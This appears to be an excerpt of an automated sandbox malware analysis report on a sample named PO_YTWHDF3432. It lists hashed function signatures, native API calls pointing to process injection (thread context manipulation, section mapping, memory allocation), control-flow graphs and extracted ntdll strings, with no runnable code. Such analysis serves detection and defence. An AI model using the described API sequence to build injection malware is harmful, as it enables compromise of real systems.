                                                                          • Opcode ID: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                          • Instruction ID: 41a694da47314c6f7953bebff27000536f1853d4fe1618860b860f471416e69f
                                                                          • Opcode Fuzzy Hash: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                          • Instruction Fuzzy Hash: 36713BB1E04258DFCB04DFA9C490AEDBBF5BF49304F18816AE859B7341D238AA52CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040ACDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                          • Instruction ID: 1c07fbbcbdb6f1aea2f7691a6cf0475e8e686830d361e3a4b3f409b1fbea8beb
                                                                          • Opcode Fuzzy Hash: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                          • Instruction Fuzzy Hash: BB814DB1E14258DFCB04CFA9C490AEDBBF5AF4D304F18816AE859B7341D238A952CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AABA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: SectionView
                                                                          • String ID:
                                                                          • API String ID: 1323581903-0
                                                                          • Opcode ID: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                          • Instruction ID: 8c108c30a1503a35fa8a721594d6fd6207328e0511ed23d5626443ae9fe78b90
                                                                          • Opcode Fuzzy Hash: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                          • Instruction Fuzzy Hash: FE713A71E04258DFCB04CFA9C590AEDBBF6AF4D304F18816AE459B7381D238A952CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF06
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                          • Instruction ID: fc9d2199742c9a8d060674d21e47953af395a2044174ee8fd2e3237901ead3e6
                                                                          • Opcode Fuzzy Hash: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                          • Instruction Fuzzy Hash: DB713DB1E14258DFCB04CFA9C490AEDBBF5BF4D304F18816AE459B7341D234A952CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B77A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                          • Instruction ID: f26121f830c0f8109234ac70a2951215a16cc0557d90fb1a5981705e0bebb243
                                                                          • Opcode Fuzzy Hash: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                          • Instruction Fuzzy Hash: 9B712A75E14158DFCB04CFA9C490AEDBBF5AF89304F18806AE459B7391D338A942CF98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtSetContextThread.NTDLL(?,?), ref: 0040A26A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                          • Instruction ID: 9b1aa35c00d12f4d4ec830877887629837b7e68d82d172a387a58b949419f852
                                                                          • Opcode Fuzzy Hash: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                          • Instruction Fuzzy Hash: 32714D71E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7381D239A952DF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtDelayExecution.NTDLL(0041A6B1,?,?,?,00000000), ref: 0040B35B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DelayExecution
                                                                          • String ID:
                                                                          • API String ID: 1249177460-0
                                                                          • Opcode ID: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                          • Instruction ID: 3be60250fe5fbc5b7b76b1735ee417b9946c579d890d9e13bfe27a8a66749d08
                                                                          • Opcode Fuzzy Hash: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                          • Instruction Fuzzy Hash: 09712E71D14158DBCB05CFA9C490AEDBBF1EF49304F1880AAE859B7341D738AA41DF98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtSuspendThread.NTDLL(?,?), ref: 00409E6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: SuspendThread
                                                                          • String ID:
                                                                          • API String ID: 3178671153-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 325 409f23-409f84 call 4097c3 call 4097d3 330 40a062-40a077 NtGetContextThread 325->330 331 409f8a-409fcf call 409863 call 42b882 call 409733 call 42b882 325->331 333 40a114-40a120 330->333 334 40a07d-40a084 330->334 353 409fda-409fe0 331->353 335 40a08f-40a095 334->335 338 40a097-40a0bb 335->338 339 40a0bd-40a0c1 335->339 338->335 341 40a103-40a111 call 409863 339->341 342 40a0c3-40a0ca 339->342 341->333 346 40a0d5-40a0db 342->346 346->341 349 40a0dd-40a101 346->349 349->346 354 409fe2-40a006 353->354 355 40a008-40a00c 353->355 354->353 355->330 356 40a00e-40a029 355->356 358 40a034-40a03a 356->358 358->330 359 40a03c-40a060 358->359 359->358
                                                                          APIs
                                                                          • NtGetContextThread.NTDLL(?,?), ref: 0040A06A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 433 4173f3-41740f 434 417417-41741c 433->434 435 417412 call 42af83 433->435 436 417422-417430 call 42b4a3 434->436 437 41741e-417421 434->437 435->434 440 417440-417451 call 429943 436->440 441 417432-41743d call 42b723 436->441 446 417453-417467 LdrLoadDll 440->446 447 41746a-41746d 440->447 441->440 446->447
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417465
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtClose.NTDLL(0041A658,?,?,00000000,?,0041A658,?,?,?,?,?,?,?,?,00000000,?), ref: 0042848A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 36 413a8d-413a90 37 413b01-413b02 36->37 38 413a92 36->38 39 413a93-413aa2 38->39 40 413ac9-413aca 38->40 41 413aa4-413aac 39->41 42 413a4f-413a52 39->42 40->39 43 413acc-413ace 40->43 44 413adf 41->44 43->44 45 413af4-413b42 43->45 46 413ae1-413ae6 44->46 47 413ae8-413aee 44->47 51 413b54-413b5d 45->51 52 413b44-413b4c 45->52 46->47 49 413af0-413af3 47->49 50 413b6f-413b8b 47->50 49->45 53 413bfd-413c5d call 42a323 call 42ad33 call 4173f3 call 4046e3 call 423e53 50->53 54 413b8d-413bea 50->54 51->50 52->51 68 413c7d-413c83 53->68 69 413c5f-413c6e PostThreadMessageW 53->69 69->68 70 413c70-413c7a 69->70 70->68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 0-4105805501
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 71 413beb-413c05 73 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 71->73 74 413c08 call 42a323 71->74 83 413c7d-413c83 73->83 84 413c5f-413c6e PostThreadMessageW 73->84 74->73 84->83 85 413c70-413c7a 84->85 85->83
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 1836367815-4105805501
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 86 413bf3-413c05 87 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 86->87 88 413c08 call 42a323 86->88 97 413c7d-413c83 87->97 98 413c5f-413c6e PostThreadMessageW 87->98 88->87 98->97 99 413c70-413c7a 98->99 99->97
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 1836367815-4105805501
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(004122B5,?,004122B5,?,00000000,004122B5,?,004122B5,?,?), ref: 004287A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00419A10,?,?,00419A10,?,?,?,00419A10,?,00002000), ref: 0042874F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,4CF2BAE6,?,?,4CF2BAE6), ref: 004287E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • Address of the debug info found in the active list., xrefs: 019554AE, 019554FA
                                                                          • 8, xrefs: 019552E3
                                                                          • Critical section address., xrefs: 01955502
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01955543
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0195540A, 01955496, 01955519
                                                                          • Invalid debug info address of this critical section, xrefs: 019554B6
                                                                          • double initialized or corrupted critical section, xrefs: 01955508
                                                                          • undeleted critical section in freed memory, xrefs: 0195542B
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019554CE
                                                                          • Critical section address, xrefs: 01955425, 019554BC, 01955534
                                                                          • corrupted critical section, xrefs: 019554C2
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019554E2
                                                                          • Critical section debug info address, xrefs: 0195541F, 0195552E
                                                                          • Thread identifier, xrefs: 0195553A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01952602
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01952624
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019524C0
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019522E4
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01952498
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01952412
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0195261F
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01952409
                                                                          • @, xrefs: 0195259B
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019525EB
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01952506
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01968A67
                                                                          • HandleTraces, xrefs: 01968C8F
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01968A3D
                                                                          • VerifierDlls, xrefs: 01968CBD
                                                                          • VerifierDebug, xrefs: 01968CA5
                                                                          • VerifierFlags, xrefs: 01968C50
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01968B8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • LdrpGenericExceptionFilter, xrefs: 01964DFC
                                                                          • ***Exception thrown within loader***, xrefs: 01964E27
                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01964E38
                                                                          • Execute '.cxr %p' to dump context, xrefs: 01964EB1
                                                                          • LdrpProtectedCopyMemory, xrefs: 01964DF4
                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01964DF5
                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 01964E06
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-2973941816
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • LdrpInitShimEngine, xrefs: 019399F4, 01939A07, 01939A30
                                                                          • apphelp.dll, xrefs: 018D6496
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01939A11, 01939A3A
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01939A2A
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01939A01
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019399ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
